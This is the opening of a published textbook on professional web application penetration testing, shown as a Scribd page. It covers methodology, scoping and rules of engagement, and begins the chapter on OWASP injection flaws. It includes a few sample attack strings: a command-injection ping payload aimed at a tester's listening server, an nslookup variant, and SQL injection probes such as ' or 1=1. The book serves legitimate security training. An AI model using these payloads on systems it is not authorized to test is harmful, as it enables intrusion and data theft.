100% found this document useful (3 votes)
1K views217 pages

The Penetration Tester S Guide To Web Applications

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
100% found this document useful (3 votes)
1K views217 pages

The Penetration Tester S Guide To Web Applications

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 217

Radar ARTECH

HOUSE
ARTECH HOUSE
INTERNET/COMPUTER SECURITY
INFORMATION
SECURITY
INFORMATION SECURITY AND PRIVACY SERIES
AND PRIVACY
SERIES

borso

The
This innovative resource provides both professionals and aspiring professionals

The penetration tester’s guide to web applications


with clear guidance on how to identify and exploit common web application
vulnerabilities. The book focuses on offensive security and how to attack web

penetration
applications. It describes each of the Open Web Application Security Project (OWASP)
top ten vulnerabilities, including broken authentication, cross-site scripting, and
insecure deserialization, and details how to identify and exploit each weakness.

Tester’s guide
Readers learn to bridge the gap between high-risk vulnerabilities and exploiting
flaws to initiate shell access. The book demonstrates how to work in a professional
services space to produce quality and thorough testing results by detailing the

to web applications
requirements of providing a best-of-class penetration testing service. It offers
insight into solutions on how to approach a web app pen test and the challenge
of integrating a mature pen testing program into an organization. Based on the
author’s many years of first-hand experience, this book provides examples of how
to break into user accounts, how to breach systems, and how to configure and
wield penetration testing tools. serge borso
Serge Borso is the founder and CEO of SpyderSec, an independent security consulting
organization specializing in penetration testing services, OSINT solutions, and security
awareness training programs. He is also an instructor at the SANS Institute and a private
cybersecurity consultant. He received his M.Sc. in computer systems security from
Colorado Technical University.

Include bar code


ISBN 13: 978-1-63081-622-3

ARTECH HOUSE
BOSTON I LONDON
www.artechhouse.com

PMS 2756 PMS 285


The Penetration Tester’s
Guide to Web Applications

borso cip.indd i 4/30/2019 2:31:14 PM


For a complete listing of titles in the
Artech House Computer Security Series,
turn to the back of this book.

borso cip.indd ii 4/30/2019 2:31:19 PM


The Penetration Tester’s
Guide to Web Applications

Serge Borso

borso cip.indd iii 4/30/2019 2:31:19 PM


Library of Congress Cataloging-in-Publication Data
A catalog record for this book is available from the U.S. Library of Congress.

British Library Cataloguing in Publication Data


A catalogue record for this book is available from the British Library.

Cover design by John Gomes

ISBN 13: 978-1-63081-622-3

© 2019 ARTECH HOUSE


685 Canton Street
Norwood, MA 02062

All rights reserved. Printed and bound in the United States of America. No part of this book
may be reproduced or utilized in any form or by any means, electronic or mechanical, including
photocopying, recording, or by any information storage and retrieval system, without permission
in writing from the publisher.
All terms mentioned in this book that are known to be trademarks or service marks have been
appropriately capitalized. Artech House cannot attest to the accuracy of this information. Use of
a term in this book should not be regarded as affecting the validity of any trademark or service
mark.

10 9 8 7 6 5 4 3 2 1

borso cip.indd iv 5/28/2019 12:33:07 PM


Contents

Preface vii
1 Introduction 1
2 OWASP A1:2017 Injection 9
3 OWASP A2:2017 Broken Authentication 31
4 OWASP A3:2017 Sensitive Data Exposure 43
5 OWASP A4:2017 XML External Entities (XXE) 55
6 OWASP A5:2017 Broken Access Control 77
7 OWASP A6:2017 Security Misconguration 97
8 OWASP A7:2017 Cross-Site Scripting (XSS) 119
9 OWASP A8:2017 Insecure Deserialization 137
10 OWASP A9:2017 Using Components with Known
Vulnerabilities 151
11 OWASP A10:2017 Insucient Logging and Monitoring 167
12 Beyond the OWASP Top 10 179
13 Testing as a Consultant and Adding Value 195
14 About the Author 199
15 Index 201

v
Preface
Welcome to the world of web application penetration testing! The purpose
of this book is to explain how a professional penetration tester attacks web
applications. This book will start by providing some background information
on penetration testing, web applications (web apps), discuss why we care
about web applications, and proceed to discuss methodology and attacks. A
primary focus will be on the OWASP top ten; identifying these aws, and
exploiting them in a meaningful way. Throughout the chapters dedicated to
specic vulnerabilities, special attention will be paid to making the content
easy to understand and each chapter will include examples, real-world stories,
references to hands-on training, and nal thoughts on the vulnerability in
question. You will obtain a clear understanding of the details of the aw,
how to exploit the aw, and the background information necessary to provide
value to your organization. The world of web applications is vast and trying
to t everything into one book would not do justice to the reader; thus, some
topics will not be covered in depth in this book.
The target audience of this book is people already performing penetra-
tion testing, primarily in-house penetration tests you conduct as part or all
of your day job. People new to the world of penetration testing, perhaps
researching the topic to help with bug bounty programs, or students should
nd it a helpful reference guide for protocol/professionalism and for gaining
technical acumen. Professionals/consultants conducting penetration tests for
clients will be able to leverage this book to enhance their current processes
and skill sets. This book is meant for an audience equipped with intermediate-
level web or application security skills. You should know the inner workings
of TCP/IP, HTTP, and encryption. You should have experience registering
a domain name, conguring a web server, setting up SSH keys, SSL/TLS
certicates, and running a website at a minimum. You should be familiar
with programming languages, know the dierence between the web and the

vii
viii The Penetration Tester's Guide to Web Applications

internet, and be aware of OWASP, CVEs, CVSS scoring and the like. Be-
ginners or people new to web application penetration testing should be able
to keep pace and understand most of the topics at a high level. Possessing
a background in application security (appsec) will be helpful for fully un-
derstanding some concepts just as experience with conducting professional
engagements will help the reader understand other topics. Like anything in
life, you will get out of this book what you put in, and as such, it may be in
your best interest to ensure you are well versed in appsec to maximize your
investment.
Penetration testing is dierent than vulnerability scanning and web appli-
cation penetration testing is signicantly dierent than network penetration
testing. When performing a web application penetration test we follow a four-
step methodology: reconnaissance, mapping, scanning, and exploitation.
Reconnaissance is the act of information gathering and comes in the form
of conducting research into our target organization (industry, location, em-
ployees, products/services, domains, hosting, DNS information, etc.), the tar-
get web application (language, CMS, open-source components, aliations,
platform/architecture, etc.), avenues of attack, web properties, and general
accumulation of open source information that we can leverage.
Mapping is how we understand the various relationships between com-
ponents of the application. This is accomplished by browsing and spider-
ing/crawling the application looking for links, submitting forms, paying at-
tention to how the application behaves, and essentially using the application
as it was intended from a nonmalicious user's perspective. Once a map of
the application has been established, more nefarious interactions with the
application take place via actively scanning for vulnerabilities.
As a sidebar, note that during the reconnaissance phase it may be ap-
parent that the content management system (CMS) being used by the appli-
cation has a known vulnerability and matching exploit. Attempt to exploit
it. . . spend up to about twenty minutes if the indicators of exploitation war-
rant this eort at this phase. Know that there is much more work to be
done in order to get a comprehensive view of the attack surface of the web
application and this deviation, while warranted, should be minimized if not
readily exploitable. Take note of the potential for abuse and move back to
the predened methodology for testing.
Scanning is the next step in our four-step methodology and comes in the
form of automated tools and hybrid approaches. Know that in the world of
network penetration testing Nessus, Rapid7/Nexpose, Qualys, and the like
dominate the market. These are not the only mature tools but can also typ-
The Penetration Tester's Guide to Web Applications ix

ically produce useful results when scanning non-web-based applications. So,


to be clear, these tools are good at nding network and operating system
(OS) level vulnerabilities, but not ideal for identifying web application vul-
nerabilities. Finding a quality, aordable general-purpose web application
vulnerability scanning tool is challenging with only a handful of choices, but
commercial products are mostly in the $5,000+ range and with the makers
of the tools mentioned, do have separate products to do just this. There are
several open-source scanning solutions to help but most are very specialized
(for instance only supporting scanning WordPress applications), or extremely
buggy to the point of being almost useless like w3af. Yes, I said it; but I don't
contribute to the project so I don't tend to complain about the seemingly
perpetual poor state of the tool.
By far the most popular and most versatile/useful tool in the web ap-
plication penetration tester's arsenal is a full-featured interception proxy:
OWASP's Zed Attack Proxy (ZAP) and/or Burp Suite Pro. ZAP is free
and open-source, includes scanning functionality, and is actively maintained.
Burp Suite has a free and paid version of its tool; the pro (paid) version
is less than $500 per user with an annual license and includes a scanning
component. ZAP is actively maintained and Java-based thus both tools can
work on most any platform running Java. These proxies aid in all phases of
our testing methodology and are customizable to meet our needs in terms
of what we want to automate or otherwise accomplish. Expect several ex-
amples throughout this book to reference these and other tools. Other than
commercial scanning tools and an interception proxy, other tools which will
be very useful are sqlmap, nmap, metasploit, and custom scripts/tools we
create ourselves along with our browser.
Know that while scanning may sound automated, the quality of the scan
results (perhaps measured on how many vulnerabilities and true positives are
identied) depend on our skills and the quality of the previously performed
steps in our methodology. For example, and to contrast with network-based
scanning, setting up an unauthenticated scan of a network is almost as simple
as dening the IP addresses to scan, a prole/set of checks to run, and starting
the scan. Conversely, taking this approach for scanning a web application is
a great way to get low-quality results at best. It's helpful to provide some
application scanning tools with the results of the mapping phase to ensure
all components of the application are scanned since some applications have
complex navigation and make heavy use of client-side code that a number
of automated tools have trouble understanding. In addition, and this will
be a recurring theme, web application scanning tools must be provided with
x The Penetration Tester's Guide to Web Applications

valid credentials if there is any hope of producing useful results. While this
concept may be foreign to some, it is absolutely imperative (in almost all
cases) that during our web application penetration testing we have credentials
to the application. Ensuring that our tool does not get logged out during its
scanning is also important as every subsequent HTTP request it makes may
be responded to with the likes of a 302 redirect to the login page, eectively
invalidating the rest of the scan. Special care must also be taken to ensure
the automated scanning does not cause harm to the application, its users,
or the back-end data store in the event that data is corrupted or otherwise
rendered unavailable. We'll talk about precautions to take and go into this
in more detail later in the book, but for now know that scanning takes eort
to do right and can provide useful results as we move to the next phase of
our methodology.
The nal phase of our methodology is exploitation and this comes in two
forms: leveraging the work performed by others, for example when we nd
a version number of software and search for a published exploit associated
with that version and proceed to use it, or by performing the research and
testing required to identify a more subtle vulnerability and crafting a working
exploit to take advantage of it. Another very common way to exploit web
application vulnerabilities is by understanding how a class of vulnerability
works, like SQL injection, and identifying that aw in our target application.
For instance, detailed information specic to your application's SQL injection
vulnerability is not going to be published in most cases, whereas the details
of how to identify and exploit SQL injection in general is well documented.
Depending on your skills and experience, your path to exploitation will vary.
Once exploitation has occurred, our four-step methodology starts over at
reconnaissance as we now will likely have access to features of the application
that are new to us such as administrative privilege or the ability to interact
with other users of the application in an unrestricted manner. Know that this
methodology is not meant to stie our eorts but rather to guide our testing
to produce thorough and quality results in a professional manner; we don't
want to miss out on testing for certain vulnerabilities due to a haphazard
approach.
Also know that there can be signicant dierences between exploitation
of web application aws and OS aws as it pertains to the impact of the
exploitation and the level of access gained. Specically, and importantly:
Scanning a network, nding a vulnerability, matching that vulnerability to
an exploit in metasploit and proceeding to gain shell access is not typically
how the process works for web applications. In fact, exploitation of a web
The Penetration Tester's Guide to Web Applications xi

application vulnerability is highly unlikely to yield shell access on the system


and much more likely to impact a given user or the condentiality of data.
The rst class of vulnerabilities we will discuss in depth is injection and,
in fact, these aws do lead to remote OS access at times. However, as we
progress down the list of the OWASP top ten, many of the vulnerabilities
focus more on users of the application as opposed to the application and
operating system itself.
To set expectations, this book does not contain any zero-day exploits, it
is not focused on network, Wi-Fi, physical, or mobile application penetra-
tion testing and advanced topics will not be at the forefront of the conver-
sation. Expect a well-written, easy-to-understand-and-follow narrative with
real-world examples from previously performed testing. There will be detailed
explanations of web application vulnerabilities in most cases including back-
ground information on the aw, its associated risk, how to exploit the aw in
a meaningful way, the root cause of the issue, and in some cases even how it
might be xed. Special attention will be placed on the oensive nature of the
topic  how to identify and exploit vulnerabilities. Some of the testing and ex-
ploitation techniques discussed will be novel in their approach and execution,
but most will be well-documented, previously discovered paths to exploita-
tion. The logic behind the attack will be discussed as will the potential for
business impact and topics of professionalism and quality of testing.
Some people learn best by listening to a lecture and taking notes, others
are visual learners and benet from videos underscoring a topic, while others
learn best by tactile methods  hands on the keyboard. In order to augment
the chapters and learning objectives in this book, you, as the purchaser of this
book, will have access to online training to enhance your learning experience
and provide more hands-on training. The goal of this book is to help you
become a more procient web application penetration tester and hands-on
training is a critical component for your success in this endeavor. Don't expect
to read this book and walk away with superior skills; you need to use this
knowledge to practice, learn, make mistakes, and grow. Expect it to literally
take years to become procient; this book, its material, topics and hands-on
training will help you on your path, but it is your persistence, desire, and
personal drive that will set you apart from others in this eld.
Know that web application penetration testing is a subcategory of pene-
tration testing, it is nuanced and does not rely on the same path to exploita-
tion, and even the initial path of discovery is dierent. While this book is
focused on professional penetration testing, and oensive in nature, at the
end of each chapter is a portion dedicated to the conclusion of the vulnera-
xii The Penetration Tester's Guide to Web Applications

bility and even some actions that can be taken to remediate the nding. This
is important as our job as a penetration tester is not to simply break things
and move on, but rather to write a coherent, well-thought-out report that
the client or our place of business can leverage to gain a deep understating
of the aw, the path to exploitation, as well as how to x it.
The purpose of this book is to explain how a professional penetration
tester attacks web applications, the goal of this book is to help you become
a more procient web application penetration tester, but it's up to you to
get the most out of it! Let's get started, but before we do there is one last
important topic to cover.
Make sure you always obtain explicit written permission from someone
with the authority to grant it prior to engaging in penetration testing, includ-
ing using any of the concepts or tools discussed in this book, and understand
the author assumes no responsibility for your actions.
Chapter 1

Introduction
The OWASP Top 10 represents a broad consensus about the most critical
security risks to web applications. During a web application penetration test,
our goal is to attempt to identify vulnerabilities on the OWASP top ten list
as well as other prevalent application centric vulnerabilities. Before delving
into each vulnerability, we'll take a moment to discuss web application pene-
tration testing, how to best approach an engagement, as well as background
information we'll need to be successful.
The internet is not the same as the web and a website is not the same as
a web application even though these terms are typically used synonymously.
A website is used to refer to a static HTML document with links, images,
perhaps some CSS and that's about it. Using a website was a common way to
share information in the early days of the web. In contrast, a web application
is dynamic. Dynamic in the sense that it takes input, some form of stimuli,
and processes this input to produce an output. An example of this would
be Google's homepage. As an end user, we submit a query (input) in the
search box, press enter and are presented with search results (output). As
a user of this web application we can see the HTML, CSS, JavaScript, and
images required to render the page in our browser; this can be accomplished
by viewing the source code of the page. What we don't see is the server-side
source code, the Python/C++/Java, as this code is housed and processed
by Google's servers. Our browser reads the client-side code and renders the
page while the server-side code takes our input, parses (reads) it, performs
a series of logic operations such as applying its search algorithm, and looks
up the database contents before returning a subset of that information to

1
2 The Penetration Tester's Guide to Web Applications

our browser to ultimately show us the search results. This is dynamic; there
is server-side processing, database lookups and interactivity built into the
platform.
This notion of dynamic is an important one as we delve into penetra-
tion testing and hone in on what is called attack surface. When we embark
on assessing the security posture of a target application, the attack sur-
face is essentially the parts of the target system that are exposed. For a
typical network-based device such as a server, this would be akin to open
ports/listening services, user accounts with access to the system, patch man-
agement, change management, virus updates, replication, and other avenues
that could lead to compromise if manipulated to cause harm. For a website,
there is not much in the way of attack surface as there is no input that will in
turn be processed once submitted other than by the webserver software like
Apache, IIS, or Nginx. For instance, if there is not a database, there is no
risk of SQL injection (SQLi). If there is no input that is processed, then a lot
of the OWASP top ten vulnerabilities are not going to be present. However,
a dynamic web application, as opposed to a static website, is likely going to
have a database, and depending on the application, a signicant amount of
input that can be manipulated to potentially cause harm to the target.
The target of our web application penetration testing is of course the web
app but the attack does not stop there. This book will make the appropriate
distinction between targeting the application and targeting the business or
users of the application like in the case of XSS. This is important because
impact can be measured in a variety of ways such as the impact to business
operations in the event of denial of service (DoS). To adequately perform
a web app penetration test, we have to take into consideration the CIA
triad which should be familiar to all CISSP holders. If any of these three
(condentially, integrity, or availability) components are compromised then
the ability for the target business to do its job in a secure fashion is severely
impaired. As such, from a penetration testing perspective these are some of
the areas where we want to pay special attention when assessing the target
environment.
The target environment is what is dened in the scope of the penetra-
tion test. This will vary depending on the predened rules of engagement.
To simplify this, let's think about a few dierent scenarios in which we may
be conducting a web application penetration test. The rst scenario is a de-
velopment version of our own personal WordPress blog. This blog resides on
a virtual machine on our workstation at home. We update the blog as we
see t and once satised with the changes or new blog posts, we push those
Introduction 3

changes to our production blog on the web. In this scenario, we want to test
our development version running on our virtual machine on our network on
our workstation in our own home: We need absolutely no one's permission to
do this test. We completely own every aspect of the target environment de-
spite the fact that we did not write the WordPress software ourself. We also
didn't write the Apache software running the website, or the Linux operating
system, or the drivers, or the BIOS or. . . . The point is that no special per-
mission is required to conduct this test and we are fully aware of the scope
of what we want tested, in this case only the WordPress web application.
But understand that as we make HTTP(S) requests to our web app, those
requests will be severed by Apache which does run atop an operating system
(OS); thus, while the scope of our test may seem well dened, in fact, the
testing may encompass OS and platform patches/vulnerabilities as well as
TLS and certication implementation and conguration which is no longer
strictly testing the web app.
The second scenario to consider is a web application penetration test of
our corporate agship web app at our place of business. This application
resides on premises in our data center behind multiple layers of security
including an IPS, rewall, and WAF. The business we work for owns the
infrastructure providing the platform for the web application. However, the
codebase is written by a third-party company and our business does not
have access to the source code. As with most mature organizations, there are
multiple versions of this application in multiple environments such as devel-
opment, QA, user acceptance testing (UAT), and production (PROD). This
application is required to be tested for regulatory compliance. Which version
of the application do we test? Do we test remotely from the internet, having
our trac ltered by multiple devices along the way or internally to by-
pass those controls? Do we test using credentials and leverage an automated
scanning tool, and if so, how will that impact other users of the system and
the database? What about permission from the third-party maintaining and
releasing the code; do we need their permission to test their application?
Let's talk about these starting with the scope of the test. The objective
is to perform a web application penetration test of the target web app which
is required for compliance so we have to test it or get evidence (and a recent
report) that the company writing the code is performing penetration test-
ing. This is not the same as static/dynamic code scanning or vulnerability
scanning; recall that penetration testing has dierent goals than scanning for
vulnerabilities, a specic methodology and potentially high risk for negative
impact as well as a signicant eort dedicated to the manual component
4 The Penetration Tester's Guide to Web Applications

of the testing. Generally speaking, since the application resides in our en-
vironment, we can test it as we see t without any need to seek or obtain
approval from the authors of the code (noting that we are not entitled to
reverse engineer the software).
Testing from the internet, having our trac sent through the rewall, IPS,
and WAF when we are not whitelisted on these devices can result in much
less of a test on the web application and more of a test on these trac ltering
devices positioned logically in front of and protecting the web application (as
seen in Figure 1.1). When the objective is to test the web application, I nd
it best to either be whitelisted on these devices, test internally to avoid these
devices, or clearly understand and communicate the results of testing may
be more prone to false negatives. The reason for this is because we want to
identify vulnerabilities on the web application and attempt to quantify the
level of risk: If there is a SQLi aw on the application and the WAF blocks
our SQLi attacks to the point where we are unaware of the aw, this type
of testing arguably is not providing the most value to the business if the
objective is to identify application layer vulnerabilities. There may be a time
when the WAF is no longer in place, or not tuned the same way, or a lter
bypass is discovered or an avenue of attack does not traverse the WAF  all
good reasons as to why the business and application developers would benet
from learning about the SQLi aw. An argument from the business on this
logic may bring into light that attackers are going to be sending trac from
the internet and having their packets ltered, thus, a fair and realistic test
would be to leave those devices in place. This is not illogical and essentially
becomes a discussion to have with the business.
In many cases the production version of the application is tested op-
posed to the development or QA or other versions. There are several reasons
why: First, I think that it would be hard to justify robust, high-quality pen-
etration testing on all versions of the application; this would be more of

Figure 1.1 This image is meant to depict the general ow of trac.
Introduction 5

a niche for automated scanning tools. Penetration testing can be expensive,


time-consuming, and when performed professionally, a signicant manual en-
deavor. Additionally, if there is a compliance reason to test the web app (it
is in-scope for PCI, HIPAA, HITRUST, part of the system boundary, etc.),
the governing body/auditing tea wants to know that the production version
is being tested, not some other version that users are not currently using.
However, it is appropriate to test non-production versions of the application
in some circumstances, such as when we are an independent contractor and
our client tells us what to test, and while we still want to be able to guide the
client to make the best decision for their business, ultimately we need to test
what they want in order to satisfy their needs. As there can be signicant
risk with penetration testing and vulnerability scanning alike, testing some-
thing other than the production version of the application can be benecial
as legitimate users are not going to be impacted by our eorts. If something
breaks there is no production outage or signicant negative impact to the
business. What is important to do is to make sure we understand the needs
and capabilities of the client and determine which version of the application
to test based on this information. This brings to light the rules of engagement
for the testing (when to test, what version to test, escalation points, contact
points, types of testing to be performed, scope of testing, etc.).
Bringing this back to our second scenario conversation, at this point it
should be clear we can test the application because we own it and it is on
our network. In addition we will be testing remotely but whitelisting our IP
address(es) to bypass WAF and IPS lters to reduce false negatives, and we
will be testing the production version of the application for compliance rea-
sons. As well, we will indeed be requesting valid credentials in the form of one
or more test accounts and this is why: thoroughness of testing. If we can't
login to the application, how deep can we test and what value do we think is
being provided? Think of a web app with a single login page available with
username and password input elds and a login button. Looking at this one
page, some testing can certainly be performed, such as initial reconnaissance,
research on the platform in use, and potential vulnerabilities associated with
that layer of software as well as brute forcing /dictionary attacks on the au-
thentication portion of the web application (perhaps a bit more but nothing
likely very fruitful depending on the rules of engagement). If we simply tested
this one page for 40 hours and call it a penetration test this would be a disser-
vice. Once a user logs into the application she is presented with an interface
allowing for le uploads, a search feature integrated with a database, mul-
tiple user roles, report generation capabilities, hundreds of dynamic inputs,
6 The Penetration Tester's Guide to Web Applications

and API documentation. Testing these application features provides value,


not trying to guess usernames and passwords for a week.
Understanding how to maximize the quality of our testing is imperative
as is conveying the importance to the business so that we provide value
and satisfy the requirements of compliance. This means that we need to
eectively communicate why we need test credentials, and why we need to
be whitelisted and so on. Testing the development version of a WordPress
application in a lab environment obviously does not have the same level of
complexity. Testing a known vulnerable web application for practice is the
same. Testing a web application as part of a bug bounty program requires
less overhead and certainly less discussion and interaction with the business.
Testing a production version of an application used by millions of clients has
a high risk of impact and the preparation and planning required to provide
a quality test takes eort.
Some readers with experience conducting black-box testing may balk at
the seemingly excessive amount of information and access being requested.
Indeed, in a black box penetration testing scenario little to no information
is given about the target environment and in practice this can make for a
challenging realistic testing scenario. The reality with web app testing how-
ever is that we are going to know what the application is (at least the URL)
and for those of us conducting in-house penetration testing we also know the
language, platform specics, infrastructure and topography details, names of
developers writing the code, and results of the latest automated scanning.
Those of use conducting bug bounty testing are going to have much less in-
formation available at the beginning of the test but even in this scenario we
are expected to use a test account or otherwise create an account on the
application to use for testing. This is a nuanced dierence between network
penetration testing and web application penetration testing.
We discussed performing testing locally in a lab environment as well as
testing third-party code hosted on our own infrastructure. What is very com-
mon today however is cloud-hosted applications. Know that no part of the
conversation or our objective changes just because the application is hosted
in the cloud (someone else's data centers) other than approvals. Amazon has
an approval document that is easy to complete/submit and asks questions
like how much bandwidth will be used throughout the course of the test.
Take special note that our cloud provider is typically responsible for security
of the cloud and not security in the cloud. This means that while our virtual
private cloud (VPC) or virtual private server (VPS) is expected to be log-
ically segmented from other clients sharing the same infrastructure, no one
Introduction 7

other than our developers and security team are responsible for securing the
code and platform. Thus, the same controls such as rewalls, IPSs and WAFs
are still part of the conversation, they are just virtualized and oered as a
service.
To nish the discussion on scoping and rules of engagement/testing re-
quirements, know that subdomains (host.example.com, host1.example.com,
etc.) may also be in-scope but potentially hosted somewhere else completely.
Also, we want to focus on identifying and exploiting at a minimum on the
OWASP top ten vulnerabilities knowing that there are many other vulner-
abilities and categories of aws we need to attempt to identify and exploit.
What OWASP has done with its top ten list is highlight the most common
and impactful aws typically impacting web apps, and as such these aws
will serve as the backdrop of a large portion of this book.
Modern web applications don't have SQLi on the login page, they have
proper security headers in place and employ TLS with a well-congured cer-
ticate and cipher suite. Development frameworks and libraries have built-in
protection for Cross Site Request Forgery (CSRF/XSRF) and Cross Site
Scripting (XSS). Cookies and authentication tokes are suciently random-
ized/complex and set with Secure, HttpOnly and SameSite ags. PCI dictates
account lockouts, password strength meters are somewhat common, and ma-
ture applications/organizations host their products behind multiple layers
of security. Easy-to-identify and impactful to exploit vulnerabilities are be-
coming harder and harder to nd. Know your target environment, know the
impetus or driving force behind the penetration test, and plan accordingly to
put yourself into a position to get the best results because there are vulner-
abilities to be found and exploited. Remember, we want to break into these
applications, gain access to sensitive information, compromise accounts, get
shell access, escalate privilege, and own the environment; do what you need
to in order to set yourself up for success!
Chapter 2

OWASP A1:2017 Injection


OWASP's Denition: Injection aws, such as SQL, NoSQL, OS, and
LDAP injection, occur when untrusted data is sent to an interpreter as part
of a command or query. The attacker's hostile data can trick the interpreter
into executing unintended commands or accessing data without proper au-
thorization.

Details: The previous denition is provided by OWASP; this category of in-


jection aws has been the number one web application security risk for many
years and can lead to signicant negative impact for a business. As eluded
to in the denition, injection comes in several forms, but in essence it is user
input failing to be properly sanitized prior to being interpreted or executed
as code. To understand what this means let's break down the last statement.
User input is something that a user can submit to a web application, such as
username and password. Input is not constrained to populating and submit-
ting text boxes, however, as every piece of data submitted to the web server
and in turn, application could, conceivably be used by the application in an
unsafe manner. To elaborate on this idea think of cookies, hidden form elds,
HTTP headers, form data, GET parameters, HTML5 and storage objects. . .
anything that the client sends to the application can be malicious in nature
and depending how the application uses this input, the malicious input cou-
pled with poor sanitization could lead to an injection aw. Thus, input can
be thought of as anything sent from the client to the server.
Sanitization of input refers to logical functions in the application's code
being used to remove malicious characters or otherwise normalize the user

9
10 The Penetration Tester's Guide to Web Applications

provided data (input) to a trusted state. This can be as simple as taking a


string of characters and removing anything that is not alphanumeric. When
this input is not sanitized (or otherwise rendered benign) there is potential
for exploitation. Cleaning user input is typically performed via the various
libraries the application references to provide the function of input saniti-
zation. On a very basic level we can think of this from the perspective of
regular expressions  pattern matching. For instance, a sanitization library
may be responsible for stripping all non-alpha characters from the input pro-
vided, thus sanitizing said input to render it safe to process or store in the
database. The library/function looks at the input provided, matches certain
characters, and removes certain characters from the input if they do not
match the desired input of alpha only characters.
There is no shortage of potential input (also referred to as attack surface)
in most modern dynamic web applications and oftentimes sanitization is lack-
ing, but alone, these two elements don't equate to an injection vulnerability.
For there to be a vulnerability there has to be some logic in the vulnerable
application's code that interprets or otherwise executes the code and even
then, there is no guarantee of an exploitable vulnerability.
The type of application and its backend processing language, operating
system, and employed technologies are all critical elements to understand
when discussing injection as each of these components may be vulnerable
and each take a specic course of action to identify and exploit. For instance,
command injection: This class of injection refers to a vulnerability which
allows an attacker to execute operating systems commands on the backend
operating system (OS). This leverages a aw in the application to provide a
level of interaction indirectly with the OS. The way to identify this type of
aw requires submitting commands through the application and observing if
those commands are in turn executed by the OS.
When attempting to identify a SQL injection vulnerability, the malicious
input we submit to the application will be in the form of SQL statements:
Submitting characters that have special meaning to the SQL interpreter in
the hopes that the application is not sanitizing our input and this input
is used directly in a SQL query. Comparing SQLi and command injection,
the injection points (HTTP headers, input boxes, cookies, parameter values,
etc.) may be the same but the attack strings we submit will be dierent. In
addition, the way the aw manifests itself may also be dierent, which makes
our job as an attacker more challenging in terms of positively identifying a
vulnerability. For example, a SQL injection aw may raise an error that could
be displayed back to our browser (or not, in the case of Blind SQL injection)
OWASP A1:2017 Injection 11

whereas a command injection aw may only be evident by running a packet


capture to listen for trac originating from the compromised host. The point
is that in actuality, the method we use to try and nd injection may not
change drastically, but the payloads we submit and the resulting observations
we make will vary depending on the class of injection we are attempting to
identify. This will become clear when we discuss several examples.

Real-World Dialog: I was performing a penetration test on a public facing


(on the internet) application used for providing resources for college prepara-
tory tests. The web application provided a search feature that I found to
be vulnerable to SQL injection. Upon discovering this aw, I exploited it
and proceeded to dump the contents of the database. Within the dump of
data were links to tests and other publicly available content that could be
accessed by simply browsing to the website and navigating its various links.
There was no authentication, no payment processing, and no evident way
to further compromise the host in this instance. In addition, the injection
vulnerability did not allow for the ability to write to the lesystem or ex-
tract all database/table data and what was available for exltration was all
public information; the system was also isolated on a dedicated server. Due
to this, the risk associated with this nding was not ranked as signicant as
the integrity and availability of the data was not at risk and arguably the
information dumped from the database was public and therefore not con-
dential in nature. The point is that while OWASP's A1 Injection category is
of particular concern, injection ndings are not always high risk and the con-
text of the nding has to be taken into consideration when calculating that
level of risk. Conversely I have exploited SQL injection aws many times to
access PCI data and gain shell access, which of course is much higher risk.
Let's talk about how to do that next.

How to Exploit: Exploiting injection vulnerabilities can be extremely easy


or exceedingly dicult. Keep in mind that in a real-world attack scenario we
may not be just attacking a web application per se; our attack trac may be
owing through various levels of defensive mechanisms (security controls) and
being impeded (dropped, altered) along the way. To exploit injection aws,
we must rst identify their existence. Identication of injection comes in the
form of interacting with the application by submitting malicious input and
seeing how the application responds to this input. An example of this would
be submitting the text strings test and test' into an input eld and seeing
how the application responds to these two separate requests. Discerning the
12 The Penetration Tester's Guide to Web Applications

Figure 2.1 Listening for trac with tcpdump.

dierences in how the application responds is our key to identifying the aw
and will be a recurring theme for identifying other vulnerabilities later in this
book. For example, the input of test should be benign and not cause an issue
whereas the input of test' may cause an error with the application due to
the single quote character being interpreted literally by SQL. By submitting
both of these inputs, one at a time, to the application and simply noticing
how the application responds to each input, we may be able to easily identify
a SQL injection issue. For instance, if the application's response results in a
page stating, "No results were found" when test was submitted and "There
is an error in your SQL syntax" when test' is submitted, we can deduce there
is likely an injection aw with the application.
Another thing to consider when working with injection aws is blind in-
jection, meaning that there is less of an obvious indicator that the application
may be vulnerable. There are varying degrees of blindness ranging from not
blind at all (an error message is displayed to the user when an injection at-
tack is submitted), to partially blind (no error messages are displayed but
discernible dierences in behavior are evident) as in the case of time-based
attacks (when we inject a command telling the SQL query to wait for an at-
tacker dened period of time before return the query results), to completely
blind where we have no real indicator that the application is vulnerable. . .
but it is. There are situations where blind injection (SQL, command, LDAP,
and other forms) is a logical vulnerability to test for, in which case we need to
be prepared to launch injection attacks that can still yield identiable results
even if those results are not always evident in our browser. To do this we
need to setup a VPS accessible to the internet or otherwise accomplish the
same goal using a locally hosted machine.
VPS hosting is cheap and we don't need signicant resources for what
we are trying to accomplish; specically, a Linux OS which we can SSH to
and have root access on will suce. This setup with one virtual CPU, one
gigabyte of RAM, and twenty gigabytes of disk space is more than sucient
and costs pennies to run on a per hour basis. What we want to do is take
note of the IP address of the VPS and execute TCPdump to listen for in-
coming trac (other than our own SSH trac) as seen in Figure 2.1. Now
when we execute our next command injection attack we can use the attack
OWASP A1:2017 Injection 13

string of ;ping 10.210.14.61 where we put in a count of pings to run and


the IP address we noted previously (likely a public facing IP hosted in the
cloud as previously mentioned). If the application is vulnerable to command
injection via the input we attacked, we should see our VPS being pinged from
the vulnerable host. The same is true for other forms of injection. There are
caveats to this such as if the vulnerable host is blocking outbound ICMP,
in which case using the nslookup utility will suce (we just need to host
our own DNS and enable enhanced logging to watch for DNS lookups to
our domain). Using this concept however is one approach to identifying an
injection vulnerability when output or evidence of the vulnerability is not di-
rectly returned to our browser. Ping and nslookup are not arbitrary example
commands; these two choices are excellent options as Microsoft, Linux, BSD
and *NIX systems not only typically have these installed by default, but they
don't require a privileged account to execute. For some testing a VPS may
not be required and our attack machine (the machine we are using to launch
attacks) can suce instead. The actual attacks (the strings of text we submit)
do vary signicantly for dierent forms of injection. For instance, the ping
and nslookup examples are specic to command injection across platforms
whereas ' or 1=1;  will work well for some SQL languages. In order to attack
with a higher degree of success, it is important to understand what the back-
end processing language is, as well as the type of database being used and of
course the underlying OS used to host the vulnerable application. Knowledge
of each of these is critical for crafting a suitable attack.

Examples: For this rst example we will be targeting a form with three
dierent input elds. Visible on the page are input boxes associated with
